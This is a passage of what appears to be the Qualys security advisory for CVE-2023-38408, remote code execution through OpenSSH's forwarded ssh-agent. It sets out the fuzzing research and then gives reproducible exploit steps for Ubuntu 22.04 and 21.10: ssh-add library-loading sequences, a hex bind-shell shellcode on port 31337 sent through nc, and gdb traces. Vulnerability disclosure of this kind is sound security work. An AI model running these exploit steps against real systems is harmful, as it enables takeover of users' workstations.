Qualys Security Advisory CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent ======================================================================== Contents ======================================================================== Summary Background Experiments Results Discussion Acknowledgments Timeline ======================================================================== Summary ======================================================================== "ssh-agent is a program to hold private keys used for public key authentication. Through use of environment variables the agent can be located and automatically used for authentication when logging in to other machines using ssh(1). ... Connections to ssh-agent may be forwarded from further remote hosts using the -A option to ssh(1) (but see the caveats documented therein), avoiding the need for authentication data to be stored on other machines." (https://man.openbsd.org/ssh-agent.1) "Agent forwarding should be enabled with caution. Users with the ability to bypass file permissions on the remote host ... can access the local agent through the forwarded connection. ... A safer alternative may be to use a jump host (see -J)." (https://man.openbsd.org/ssh.1) Despite this warning, ssh-agent forwarding is still widely used today. Typically, a system administrator (Alice) runs ssh-agent on her local workstation, connects to a remote server with ssh, and enables ssh-agent forwarding with the -A or ForwardAgent option, thus making her ssh-agent (which is running on her local workstation) reachable from the remote server. While browsing through ssh-agent's source code, we noticed that a remote attacker, who has access to the remote server where Alice's ssh-agent is forwarded to, can load (dlopen()) and immediately unload (dlclose()) any shared library in /usr/lib* on Alice's workstation (via her forwarded ssh-agent, if it is compiled with ENABLE_PKCS11, which is the default). (Note to the curious readers: for security reasons, and as explained in the "Background" section below, ssh-agent does not actually load such a shared library in its own address space (where private keys are stored), but in a separate, dedicated process, ssh-pkcs11-helper.) Although this seems safe at first (because every shared library in /usr/lib* comes from an official distribution package, and no operation besides dlopen() and dlclose() is generally performed by ssh-agent on a shared library), many shared libraries have unfortunate side effects when dlopen()ed and dlclose()d, and are therefore unsafe to be loaded and unloaded in a security-sensitive program such as ssh-agent. For example, many shared libraries have constructor and destructor functions that are automatically executed by dlopen() and dlclose(), respectively. Surprisingly, by chaining four common side effects of shared libraries from official distribution packages, we were able to transform this very limited primitive (the dlopen() and dlclose() of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution in ssh-agent (despite ASLR, PIE, and NX). Our best proofs of concept so far exploit default installations of Ubuntu Desktop plus three extra packages from Ubuntu's "universe" repository. We believe that even better results can be achieved (i.e., some operating systems might be exploitable in their default installation): - we only investigated Ubuntu Desktop 22.04 and 21.10, we have not looked into any other versions, distributions, or operating systems; - the "fuzzer" that we wrote to test our ideas is rudimentary and slow, and we ran it intermittently on a single laptop, so we have not tried all the combinations of shared libraries and side effects; - we initially had only one attack vector in mind (i.e., one specific combination of side effects from shared libraries), but we discovered six more while analyzing the results of our fuzzer, and we are convinced that more attack vectors exist. In this advisory, we present our research, experiments, reproducible results, and further ideas to exploit this "dlopen() then dlclose()" primitive. We will also publish the source code of our crude fuzzer at https://www.qualys.com/research/security-advisories/ (warning: this code might hurt the eyes of experienced fuzzing practitioners, but it gave us quick answers to our many questions; it is provided "as is", in the hope that it will be useful). ======================================================================== Background ======================================================================== The ability to load and unload shared libraries in ssh-agent was developed in 2010 to support the addition and deletion of PKCS#11 keys: ssh-agent forks and executes a long-running ssh-pkcs11-helper process that dlopen()s PKCS#11 providers (shared libraries), and immediately dlclose()s them if the symbol C_GetFunctionList cannot be found (i.e., if such a shared library is not actually a PKCS#11 provider, which is the case for the vast majority of the shared libraries in /usr/lib*). Note: ssh-agent also supports the addition of FIDO keys, by loading a FIDO authenticator (a shared library) in a short-lived ssh-sk-helper process; however, unlike ssh-pkcs11-helper, ssh-sk-helper is stateless (it terminates shortly after loading a single shared library) and can therefore not be abused by an attacker to chain the side effects of several shared libraries. Originally, the path of a shared library to be loaded in ssh-pkcs11-helper was not filtered at all by ssh-agent, but in 2016 an allow-list was added ("/usr/lib*/*,/usr/local/lib*/*" by default) in response to CVE-2016-10009, which was published by Jann Horn (at https://bugs.chromium.org/p/project-zero/issues/detail?id=1009): - if an attacker had access to the server where Alice's ssh-agent is forwarded to, and had an unprivileged access to Alice's workstation, then this attacker could store a malicious shared library in /tmp on Alice's workstation and execute it with Alice's privileges (via her forwarded ssh-agent) -- a mild form of Local Privilege Escalation; - if the attacker had only access to the server where Alice's ssh-agent is forwarded to, but could somehow store a malicious shared library somewhere on Alice's workstation (without access to her workstation), then this attacker could remotely execute this shared library (via Alice's forwarded ssh-agent) -- a mild form of Remote Code Execution. Our first reaction was of course to try to bypass ssh-agent's /usr/lib* allow-list: - by finding a logic bug in the filter function, match_pattern_list() (but we failed); - by making a path-traversal attack, for example /usr/lib/../../tmp (but we failed, because ssh-agent first calls realpath() to canonicalize the path of a shared library, and then calls the filter function); - by finding a locally or remotely writable file or directory in /usr/lib* (but we failed). Our only option, then, is to abuse side effects of the existing shared libraries in /usr/lib*; in particular, their constructor and destructor functions, which are automatically executed by dlopen() and dlclose(). Eventually, we realized that this is essentially a remote version of CVE-2010-3856, which was published in 2010 by Tavis Ormandy (at https://seclists.org/fulldisclosure/2010/Oct/344): - an unprivileged local attacker could dlopen() any shared library from /lib and /usr/lib (via the LD_AUDIT environment variable), even when executing a SUID-root program; - the constructor functions of various common shared libraries created files and directories whose location depended on the attacker's environment variables and whose creation mode depended on the attacker's umask; - the local attacker could therefore create world-writable files and directories anywhere in the filesystem, and obtain full root privileges (via crond, for example). Although the ability to load and unload shared libraries from /usr/lib* in ssh-agent bears a striking resemblance to CVE-2010-3856, we are in a much weaker position here, because we are trying to exploit ssh-agent remotely, so we do not control its environment variables nor its umask (and we do not even talk directly to ssh-pkcs11-helper, which actually dlopen()s and dlclose()s the shared libraries: we talk to ssh-agent, which canonicalizes and filters our requests before passing them on to ssh-pkcs11-helper). In fact, we do not control anything except the order in which we load (and immediately unload) shared libraries from /usr/lib* in ssh-agent. At that point, we almost abandoned our research, because we could not possibly imagine how to transform this extremely limited primitive into a one-shot remote code execution. Nevertheless, we felt curious and decided to syscall-trace (strace) a dlopen() and dlclose() of every shared library in the default installation of Ubuntu Desktop. We instantly observed four surprising behaviors: ------------------------------------------------------------------------ 1/ Some shared libraries require an executable stack, either explicitly because of an RWE (readable, writable, executable) GNU_STACK ELF header, or implicitly because of a missing GNU_STACK ELF header (in which case the loader defaults to an executable stack): when such an "execstack" library is dlopen()ed, the loader makes the main stack and all thread stacks executable, and they remain executable even after dlclose(). For example, /usr/lib/systemd/boot/efi/linuxx64.elf.stub in the default installation of Ubuntu Desktop 22.04. ------------------------------------------------------------------------ 2/ Many shared libraries are marked as "nodelete" by the loader, either explicitly because of a NODELETE ELF flag, or implicitly because they are in the dependency list of a NODELETE library: the loader will never unload (munmap()) such libraries, even after they are dlclose()d. For example, /usr/lib/x86_64-linux-gnu/librt.so.1 in the default installation of Ubuntu Desktop 22.04 and 21.10. ------------------------------------------------------------------------ 3/ Some shared libraries register a signal handler for SIGSEGV when they are dlopen()ed, but they do not deregister this signal handler when they are dlclose()d (i.e., this signal handler is still registered when its code is munmap()ed). For example, /usr/lib/x86_64-linux-gnu/libSegFault.so in the default installation of Ubuntu Desktop 21.10. ------------------------------------------------------------------------ 4/ Some shared libraries crash with a SIGSEGV as soon as they are dlopen()ed (usually because of a NULL-pointer dereference), because they are supposed to be loaded in a specific context, not in a random program such as ssh-agent. For example, most of the /usr/lib/x86_64-linux-gnu/xtables/lib*.so in the default installation of Ubuntu Desktop 22.04 and 21.10. ------------------------------------------------------------------------ And so an exciting idea to remotely exploit ssh-agent came into our mind: a/ make ssh-agent's stack executable (more precisely, ssh-pkcs11-helper's stack) by dlopen()ing one of the "execstack" libraries ("surprising behavior 1/"), and somehow store a 1990-style shellcode somewhere in this executable stack; b/ register a signal handler for SIGSEGV and immediately munmap() its code, by dlopen()ing and dlclose()ing one of the shared libraries from "surprising behavior 3/" (consequently, a dangling pointer to this unmapped signal handler is retained in the kernel); c/ replace the unmapped signal handler's code with another piece of code from another shared library, by dlopen()ing (mmap()ing) one of the "nodelete" libraries ("surprising behavior 2/"); d/ raise a SIGSEGV by dlopen()ing one of the shared libraries from "surprising behavior 4/", so that the unmapped signal handler is called by the kernel, but the replacement code from the "nodelete" library is executed instead (a use-after-free of sorts); e/ hope that this replacement code (which is mapped where the signal handler was mapped) is a useful gadget that somehow jumps into the executable stack, exactly where our shellcode is stored. ======================================================================== Experiments ======================================================================== But "hope is not a strategy", so we decided to implement the following 6-step plan to test our remote-exploitation idea in ssh-agent: ------------------------------------------------------------------------ Step 1 - We install a default Ubuntu Desktop, download all official packages from Ubuntu's "main" and "universe" repositories, and extract all /usr/lib* files from these packages. These files occupy ~200GB of disk space and include ~60,000 shared libraries. Note: after the default installation of Ubuntu Desktop, but before the extraction of all /usr/lib* files, we "chattr +i /etc/ld.so.cache" to make sure that this file does not grow unrealistically (from kilobytes to megabytes); indeed, it is mmap()ed by the loader every time dlopen() is called, and a large file might therefore destroy the mmap layout and prevent our fuzzer's results from being reproducible in the real world. ------------------------------------------------------------------------ Step 2 - For each shared library in /usr/lib*, we fork and execute ssh-pkcs11-helper, strace it, and request it to dlopen() (and hence immediately dlclose()) this shared library; if we spot anything unusual in the strace logs (a raised signal, a clone() call, etc) or outstanding differences in /proc/pid/maps or /proc/pid/status between before and after dlopen() and dlclose(), then we mark this shared library as interesting. ------------------------------------------------------------------------ Step 3 - We analyze the results of Step 2. For example, on Ubuntu Desktop 22.04: - 58 shared libraries make the stack executable when dlopen()ed (and the stack remains executable even after dlclose()); - 16577 shared libraries permanently alter the mmap layout when dlopen()ed (either because they are "nodelete" libraries, or because they allocate a thread stack or otherwise leak mmap()ed memory); - 9 shared libraries register a SIGSEGV handler when dlopen()ed (but do not deregister it when dlclose()d), and 238 shared libraries raise a SIGSEGV when dlopen()ed; - 2 shared libraries register a SIGABRT handler when dlopen()ed, and 44 shared libraries raise a SIGABRT when dlopen()ed. On Ubuntu Desktop 21.10: - 30 shared libraries make the stack executable; - 16172 shared libraries permanently alter the mmap layout; - 9 shared libraries register a SIGSEGV handler, and 147 shared libraries raise a SIGSEGV; - 2 shared libraries register a SIGABRT handler, and 38 shared libraries raise a SIGABRT; - 1 shared library registers a SIGBUS handler, and 11 shared libraries raise a SIGBUS; - 1 shared library registers a SIGCHLD handler, and 61 shared libraries raise a SIGCHLD; - 1 shared library registers a SIGILL handler, and 1 shared library raises a SIGILL. ------------------------------------------------------------------------ Step 4 - We implement a rudimentary fuzzing strategy, by forking and executing ssh-pkcs11-helper in a loop, and by loading (and unloading) random combinations of the interesting shared libraries from Step 3: a/ we randomly load zero or more shared libraries that permanently alter the mmap layout, in the hope of creating holes in the mmap layout, thus potentially shifting the replacement code (which will later replace the signal handler's code) with page precision; b/ we randomly load one shared library that registers a signal handler but does not deregister it when dlclose()d (i.e., when munmap()ed); c/ we randomly load zero or more shared libraries that alter the mmap layout (again), thus replacing the unmapped signal handler's code with another piece of code (a hopefully useful gadget) from another shared library (a "nodelete" library); d/ we randomly load one shared library that raises the signal that is caught by the unmapped signal handler: the replacement code (gadget) is executed instead, and if it jumps into the stack (a SEGV_ACCERR with a RIP register that points to the stack, because we did not make the stack executable in this Step 4), then we mark this particular combination of shared libraries as interesting. Surprise: we actually get numerous jumps to the stack in this Step 4, usually because the signal handler's code is replaced by a "jmp REG", "call REG", or "pop; pop; ret" gadget, and the "REG" or popped RIP register happens to point to the stack at the time of the jump. ------------------------------------------------------------------------ Step 5 - We implement this extra step to test whether the interesting combinations of shared libraries from Step 4 actually jump into our shellcode in the stack, or into uncontrolled data in the stack: a/ we make the stack executable, by randomly loading one of the "execstack" libraries from Step 3; b/ we store ~10KB of 0xcc bytes in the stack buffer "buf" of ssh-pkcs11-helper's main() function: 10KB is the maximum message length that we can send to ssh-pkcs11-helper (via ssh-agent), and on amd64 0xcc is the "int3" instruction that generates a SIGTRAP when executed; c/ we randomly replay one of the interesting combinations of shared libraries from Step 4: if a SIGTRAP is generated while the RIP register points to the stack, then there is a fair chance that ssh-pkcs11-helper jumped into our shellcode (our 0xcc bytes) in the executable stack. Surprise: we actually get many SIGTRAPs in the stack during this Step 5, but to our great dismay, most of these SIGTRAPs are generated because ssh-pkcs11-helper jumps into the stack, in the middle of a pointer that is stored on the stack and that happens to contain a 0xcc byte because of ASLR (i.e., not because ssh-pkcs11-helper jumps into our own 0xcc bytes in the stack). ------------------------------------------------------------------------ Step 6 - We implement this extra step to eliminate the false positives produced by Step 5: a/ we repeatedly replay (N times) each combination of shared libraries that generates a SIGTRAP in the stack: if N SIGTRAPs are generated out of N replays, then there is an excellent chance that ssh-pkcs11-helper does indeed jump into our shellcode (our 0xcc bytes) in the stack (and not into random bytes that happen to be 0xcc because of ASLR); b/ if this is confirmed by a manual check (with gdb for example), then we achieved a reliable, one-shot remote code execution in ssh-agent, despite the very limited primitive, and despite ASLR, PIE, and NX. ======================================================================== Results ======================================================================== In this section, we present the results of our experiments: - Signal handler use-after-free (Ubuntu Desktop 22.04) - Signal handler use-after-free (Ubuntu Desktop 21.10) - Callback function use-after-free - Return from syscall use-after-free - Sigaltstack use-after-free - Sigreturn to arbitrary instruction pointer - _Unwind_Context type-confusion - RCE in library constructor ======================================================================== Signal handler use-after-free (Ubuntu Desktop 22.04) ======================================================================== This was our original idea for remotely attacking ssh-agent, as discussed at the end of the "Background" section and as implemented in the "Experiments" section. In this subsection, we present one of the various combinations of shared libraries that result in a reliable, one-shot remote code execution in ssh-agent on Ubuntu Desktop 22.04. ------------------------------------------------------------------------ 1a/ On our local workstation, we install a default Ubuntu Desktop 22.04 (https://old-releases.ubuntu.com/releases/22.04/ubuntu-22.04-desktop-amd64.iso), without connecting this workstation to the Internet. ------------------------------------------------------------------------ 1b/ After the installation is complete, we modify /etc/apt/sources.list to prevent any package from being upgraded to a version that is not the one that we used in our experiments: workstation# cp -i /etc/apt/sources.list /etc/apt/sources.list.backup workstation# grep ' jammy ' /etc/apt/sources.list.backup > /etc/apt/sources.list ------------------------------------------------------------------------ 1c/ We connect our workstation to the Internet, and install the three packages (from Ubuntu's official "universe" repository) that contain the three shared libraries used in this particular attack against ssh-agent: workstation# apt-get update workstation# apt-get upgrade workstation# apt-get --no-install-recommends install eclipse-titan workstation# apt-get --no-install-recommends install libkf5sonnetui5 workstation# apt-get --no-install-recommends install libns3-3v5 ------------------------------------------------------------------------ 2/ As Alice, we run ssh-agent on our local workstation, connect to a remote server with ssh, and enable ssh-agent forwarding with -A: workstation$ id uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) workstation$ eval `ssh-agent -s` Agent pid 1105 workstation$ echo /tmp/ssh-*/agent.* /tmp/ssh-XXXXXXmgHTo9/agent.1104 workstation$ ssh -A server server$ id uid=1001(alice) gid=1001(alice) groups=1001(alice) server$ echo /tmp/ssh-*/agent.* /tmp/ssh-N5EjHljGRh/agent.1299 ------------------------------------------------------------------------ 3/ Then, as a remote attacker who has access to this server: ------------------------------------------------------------------------ 3a/ we remotely make ssh-agent's stack executable (more precisely, ssh-pkcs11-helper's stack), via Alice's ssh-agent forwarding (indeed, the ssh-agent itself is running on Alice's workstation, not on the server): server# echo /tmp/ssh-*/agent.* /tmp/ssh-N5EjHljGRh/agent.1299 server# export SSH_AUTH_SOCK=/tmp/ssh-N5EjHljGRh/agent.1299 server# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation ------------------------------------------------------------------------ 3b/ we remotely store a shellcode in the stack buffer "buf" of ssh-pkcs11-helper's main() function: server# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' server# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK" [Press Ctrl-C after a few seconds.] - we do not use ssh-add here, because we want to send a ~10KB passphrase (our shellcode) to ssh-agent, but ssh-add limits the length of our passphrase to 1KB; - "\x90" x 10000 is a ~10KB "NOP sled" (on amd64, 0x90 is the "nop" instruction); - SHELLCODE is a "TCP bind shell" on port 31337 (from https://shell-storm.org/shellcode/files/shellcode-858.html); - /usr/lib/modules is an existing directory whose path matches ssh-agent's /usr/lib* allow-list (indeed, we do not want to actually load a shared library here -- we just want to store our shellcode in the executable stack); ------------------------------------------------------------------------ 3c/ we remotely register a SIGSEGV handler, and immediately munmap() its code: server# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation ------------------------------------------------------------------------ 3d/ we remotely replace the unmapped SIGSEGV handler's code with another piece of code (a useful gadget) from another shared library: server# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0 Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation ------------------------------------------------------------------------ 3e/ we remotely raise a SIGSEGV in ssh-pkcs11-helper: server# ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0 Enter passphrase for PKCS#11: whatever [Press Ctrl-C after a few seconds.] ------------------------------------------------------------------------ 3f/ the replacement code (gadget) is executed (instead of the unmapped SIGSEGV handler's code) and jumps to the stack, into our shellcode, which binds a shell on TCP port 31337 on Alice's workstation: server# nc -v workstation 31337 Connection to workstation 31337 port [tcp/*] succeeded! workstation$ id uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) workstation$ ps axuf USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND ... alice 1105 0.0 0.1 7968 4192 ? Ss 09:48 0:00 ssh-agent -s alice 1249 0.0 0.0 2888 956 ? S 10:03 0:00 \_ [sh] alice 1268 0.0 0.0 7204 3092 ? R 10:14 0:00 \_ ps axuf ------------------------------------------------------------------------ To get a clear view of the replacement code (the useful gadget) that is executed instead of the unmapped SIGSEGV handler and that jumps into the NOP sled of our shellcode (in the executable stack), we relaunch our attack against ssh-agent and attach to ssh-pkcs11-helper with gdb: workstation$ gdb /usr/lib/openssh/ssh-pkcs11-helper 1307 ... (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fb15c9b560e in std::_Rb_tree_decrement(std::_Rb_tree_node_base*) () from /lib/x86_64-linux-gnu/libstdc++.so.6 (gdb) stepi 0x00007fb15d0e1250 in ?? () from /lib/x86_64-linux-gnu/libQt5Widgets.so.5 (gdb) x/10i 0x00007fb15d0e1250 => 0x7fb15d0e1250: add %rcx,%rdx 0x7fb15d0e1253: notrack jmp *%rdx ... (gdb) stepi 0x00007fb15d0e1253 in ?? () from /lib/x86_64-linux-gnu/libQt5Widgets.so.5 (gdb) stepi 0x00007ffc2ec82691 in ?? () (gdb) x/10i 0x00007ffc2ec82691 => 0x7ffc2ec82691: nop 0x7ffc2ec82692: nop 0x7ffc2ec82693: nop 0x7ffc2ec82694: nop 0x7ffc2ec82695: nop 0x7ffc2ec82696: nop 0x7ffc2ec82697: nop 0x7ffc2ec82698: nop 0x7ffc2ec82699: nop 0x7ffc2ec8269a: nop (gdb) !grep stack /proc/1307/maps 7ffc2ec66000-7ffc2ec87000 rwxp 00000000 00:00 0 [stack] ======================================================================== Signal handler use-after-free (Ubuntu Desktop 21.10) ======================================================================== In this subsection, we present one of the various combinations of shared libraries that result in a reliable, one-shot remote code execution in ssh-agent on Ubuntu Desktop 21.10. ------------------------------------------------------------------------ 1a/ On our local workstation, we install a default Ubuntu Desktop 21.10 (https://old-releases.ubuntu.com/releases/21.10/ubuntu-21.10-desktop-amd64.iso), without connecting this workstation to the Internet. ------------------------------------------------------------------------ 1b/ After the installation is complete, we modify /etc/apt/sources.list to prevent any package from being upgraded to a version that is not the one that we used in our experiments: workstation# cp -i /etc/apt/sources.list /etc/apt/sources.list.backup workstation# echo 'deb https://old-releases.ubuntu.com/ubuntu/ impish main restricted universe' > /etc/apt/sources.list ------------------------------------------------------------------------ 1c/ We connect our workstation to the Internet, and install the three packages (from Ubuntu's official "universe" repository) that contain the three extra shared libraries used in this attack against ssh-agent: workstation# apt-get update workstation# apt-get upgrade workstation# apt-get --no-install-recommends install syslinux-common workstation# apt-get --no-install-recommends install libgnatcoll-postgres1 workstation# apt-get --no-install-recommends install libenca-dbg ------------------------------------------------------------------------ 2/ As Alice, we run ssh-agent on our local workstation, connect to a remote server with ssh, and enable ssh-agent forwarding with -A: workstation$ id uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),133(lxd),134(sambashare) workstation$ eval `ssh-agent -s` Agent pid 912 workstation$ echo /tmp/ssh-*/agent.* /tmp/ssh-GnpGKph6xbe3/agent.911 workstation$ ssh -A server server$ id uid=1001(alice) gid=1001(alice) groups=1001(alice) server$ echo /tmp/ssh-*/agent.* /tmp/ssh-30N8pjTKWn/agent.996 ------------------------------------------------------------------------ 3/ Then, as a remote attacker who has access to this server: ------------------------------------------------------------------------ 3a/ we remotely make ssh-agent's stack executable (more precisely, ssh-pkcs11-helper's stack), via Alice's ssh-agent forwarding: server# echo /tmp/ssh-*/agent.* /tmp/ssh-30N8pjTKWn/agent.996 server# export SSH_AUTH_SOCK=/tmp/ssh-30N8pjTKWn/agent.996 server# ssh-add -s /usr/lib/syslinux/modules/efi64/gfxboot.c32 Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/syslinux/modules/efi64/gfxboot.c32": agent refused operation ------------------------------------------------------------------------ 3b/ we remotely store a shellcode in the stack of ssh-pkcs11-helper: server# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' server# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK" [Press Ctrl-C after a few seconds.] ------------------------------------------------------------------------ 3c/ we remotely alter the mmap layout of ssh-pkcs11-helper: server# ssh-add -s /usr/lib/pulse-15.0+dfsg1/modules/module-remap-sink.so Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/pulse-15.0+dfsg1/modules/module-remap-sink.so": agent refused operation ------------------------------------------------------------------------ 3d/ we remotely register a SIGBUS handler, and immediately munmap() its code: server# ssh-add -s /usr/lib/x86_64-linux-gnu/libgnatcoll_postgres.so.1 Enter passphrase for PKCS#11: whatever Could not add card "/usr/lib/x86_64-linux-gnu/libgnatcoll_postgres.so.1": agent refused operation ------------------------------------------------------------------------ 3e/ we remotely alter the mmap layout of ssh-pkcs11-helper (again), and replace the unmapped SIGBUS handler's code with another piece of code (a useful gadget) from another shared library: server# ssh-add -s /usr/lib/pulse-15.0+dfsg1/modules/module-http-protocol-unix.so server# ssh-add -s /usr/lib/x86_64-linux-gnu/sane/libsane-hp.so.1.0.32 server# ssh-add -s /usr/lib/libreoffice/program/libindex_data.so server# ssh-add -s /usr/lib/x86_64-linux-gnu/gstreamer-1.0/libgstaudiorate.so server# ssh-add -s /usr/lib/libreoffice/program/libscriptframe.so server# ssh-add -s /usr/lib/x86_64-linux-gnu/libisccc-9.16.15-Ubuntu.so server# ssh-add -s /usr/lib/x86_64-linux-gnu/libxkbregistry.so.0.0.0 ------------------------------------------------------------------------ 3f/ we remotely raise a SIGBUS in ssh-pkcs11-helper: server# ssh-add -s /usr/lib/debug/.build-id/15/c0bee6bcb06fbf381d0e0e6c52f71e1d1bd694.debug Enter passphrase for PKCS#11: whatever [Press Ctrl-C after a few seconds.] ------------------------------------------------------------------------ 3g/ the replacement code (gadget) is executed (instead of the unmapped SIGBUS handler's code) and jumps to the stack, then into our shellcode, which binds a shell on TCP port 31337 on Alice's workstation: server# nc -v workstation 31337 Connection to workstation 31337 port [tcp/*] succeeded! workstation$ id uid=1000(alice) gid=1000(alice) groups=1000(alice),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),133(lxd),134(sambashare) workstation$ ps axuf USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND ... alice 912 0.0 0.0 6060 2312 ? Ss 17:18 0:00 ssh-agent -s alice 928 0.0 0.0 2872 956 ? S 17:25 0:00 \_ [sh] alice 953 0.0 0.0 7060 3068 ? R 17:40 0:00 \_ ps axuf ------------------------------------------------------------------------ To get a clear view of the replacement code (the useful gadget) that is executed instead of the unmapped SIGBUS handler and that jumps into the NOP sled of our shellcode (in the executable stack), we relaunch our attack against ssh-agent and attach to ssh-pkcs11-helper with gdb: workstation$ gdb /usr/lib/openssh/ssh-pkcs11-helper 1225 ... (gdb) continue Continuing. Program received signal SIGBUS, Bus error. memset () at ../sysdeps/x86_64/multiarch/memset-vec-unaligned-erms.S:186 (gdb) stepi 0x00007f2ba9d7c350 in ?? () from /usr/lib/libreoffice/program/libuno_cppuhelpergcc3.so.3 (gdb) x/10i 0x00007f2ba9d7c350 => 0x7f2ba9d7c350: add $0x28,%rsp 0x7f2ba9d7c354: mov %r12,%rax 0x7f2ba9d7c357: pop %rbx 0x7f2ba9d7c358: pop %rbp 0x7f2ba9d7c359: pop %r12 0x7f2ba9d7c35b: pop %r13 0x7f2ba9d7c35d: pop %r14 0x7f2ba9d7c35f: pop %r15 0x7f2ba9d7c361: ret ... (gdb) stepi ... 0x00007f2ba9d7c361 in ?? () from /usr/lib/libreoffice/program/libuno_cppuhelpergcc3.so.3 (gdb) stepi 0x00007fff7aae5e90 in ?? () (gdb) x/10i 0x00007fff7aae5e90 => 0x7fff7aae5e90: add %dl,(%rax) 0x7fff7aae5e92: and %eax,(%rax) 0x7fff7aae5e94: add %al,(%rax) 0x7fff7aae5e96: add %al,(%rax) 0x7fff7aae5e98: add %ah,(%rax) 0x7fff7aae5e9a: and %eax,(%rax) 0x7fff7aae5e9c: add %al,(%rax) 0x7fff7aae5e9e: add %al,(%rax) 0x7fff7aae5ea0: call 0x7fff7aae7fbe ... (gdb) stepi ... 0x00007fff7aae5ea0 in ?? () (gdb) stepi 0x00007fff7aae7fbe in ?? () (gdb) x/10i 0x00007fff7aae7fbe => 0x7fff7aae7fbe: nop 0x7fff7aae7fbf: nop 0x7fff7aae7fc0: nop 0x7fff7aae7fc1: nop 0x7fff7aae7fc2: nop 0x7fff7aae7fc3: nop 0x7fff7aae7fc4: nop 0x7fff7aae7fc5: nop 0x7fff7aae7fc6: nop 0x7fff7aae7fc7: nop (gdb) !grep stack /proc/1225/maps 7fff7aacb000-7fff7aaeb000 rwxp 00000000 00:00 0 [stack] ======================================================================== Callback function use-after-free ======================================================================== While analyzing the first results of our fuzzer, we noticed that some combinations of shared libraries jump to the stack although they do not register any signal handler or raise any signal; how is this possible? On investigation, we understood that: - a core library (for example, libgcrypt.so or libQt5Core.so) is loaded but not unloaded (munmap()ed) by dlclose(), because it is marked as "nodelete" by the loader; - a shared library (for example, libgnunetutil.so or gammaray_probe.so) is loaded and registers a userland callback function with the core library (via gcry_set_allocation_handler() or qtHookData[], for example), but it does not deregister this callback function when dlclose()d (i.e., when its code is munmap()ed); - another shared library is loaded (mmap()ed) and replaces the unmapped callback function's code with another piece of code (a useful gadget); - yet another shared library is loaded and calls one of the core library's functions, which in turn calls the unmapped callback function and therefore executes the replacement code (the useful gadget) instead, thus jumping to the stack. ------------------------------------------------------------------------ In the following example, one of the core library's functions is called at line 66254, the unmapped callback function is called at line 66288, the replacement code (gadget) is executed instead at line 66289, and jumps to the stack at line 66293 (ssh-pkcs11-helper segfaults here because we did not make the stack executable): Attaching to program: /usr/lib/openssh/ssh-pkcs11-helper, process 3628979 ... (gdb) record btrace (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fff5000d9d0 in ?? () (gdb) !grep stack /proc/3628979/maps 7fff4fff3000-7fff50014000 rw-p 00000000 00:00 0 [stack] (gdb) set record instruction-history-size 100 (gdb) record instruction-history ... 66254 